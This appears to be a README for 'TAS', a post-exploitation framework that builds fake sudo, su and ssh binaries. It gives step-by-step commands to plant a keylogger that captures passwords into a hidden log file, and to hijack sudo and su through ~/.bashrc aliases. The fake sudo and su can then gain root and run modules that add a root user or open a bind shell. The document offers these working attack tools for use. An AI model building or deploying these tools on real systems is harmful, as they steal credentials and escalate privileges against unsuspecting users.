A tiny framework for easily manipulate the tty and create fake binaries.
How it works?
The framework has three main functions, tas_execv, tas_forkpty, and tas_tty_loop.
- tas_execv: It is a function similar to execv, but it doesn't re-execute the current binary, something very useful for creating fake binaries.
- tas_forkpty: Is the same as forkpty, but it fills a custom structure, check forkpty man page for more details.
- tas_tty_loop: here is where the manipulation of the tty happen, you can set a hook function for the input and output, so it is possible to store the keys typed by the user or manipulate the terminal output. (see leet-shell).
Fakebins
Through manipulation of the PATH environment variable, or by using bash's aliases (or any other shell that supports aliases), you can run another program instead of the program that the user usually runs. This makes it possible to capture keystrokes and modify the command line to change the original program behavior.
Change the command line of some programs, like sudo and su, can lead to privilege escalation.
I'd created three programs as an example of what you can do with the framework: sudo, su and generic-keylogger.
generic-keylogger
The generic-keylogger, as the name suggests, is a binary that acts like a keylogger, the main idea is to use it to get passwords of programs like ssh, mysql, etc.
sudo/su
It can be used as a keylogger, or you can run some of the modules as root, by manipulating the command line.
Step-by-step cmd change:
The user types
sudo cmd
fakesudo cmd
runsThe fakesudo executes
sudo fakesudo cmd
After it is running as root, the fakesudo create a child process for executing some of the modules, and in the main PID, it runs the original command.
Note: fakesudo only changes the command if the user runs sudo cmd [args]
, if some additional flags are used, then the command isn't touched.
Almost the same process happens with the su:The user types
su -
fakesu -
runsThe fakesu executes
su - -c fakesu
After it is running as root, the fakesu create a child process for executing some of the modules, and in the main PID, it runs
bash -i
Note: fakesu only changes the command if the user runssu
orsu -
, if some additional flags are used, then the command isn't touched.
Modules
For now, there are only three modules:
- add-root-user - creates a root user with password in /etc/passwd.
- bind-shell - listen for incoming connections and spawn a tty shell.
- system - executes a command as root.
super()
function.Building
First, build the base library:
$ make
CC .obj/globals.o
CC .obj/getinode.o
CC .obj/tas-execv.o
CC .obj/tty.o
CC .obj/xreadlink.o
AR .obj/libtas.a
make [target-bin]
Example:
$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'
Examples
Creating a fakessh:
Compile:
$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'
$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc
Using the bind-shell module
Compile:
make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'
$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc
leet-shell
leet-shell is an example of how you can manipulate the tty output, it allows you to use the bash like a 1337 h4x0r.
[test@alfheim tas]$ make fun/leet-shell
CC fun/leet-shell
[t3st@alfheim tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[t3st@4lfh31m t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!
Tags
Binary
Command Line
Fakebin
Fakesu
Fakesudo
Framework
Passwords
Post-Exploitation
Privilege Escalation
TAS
Tty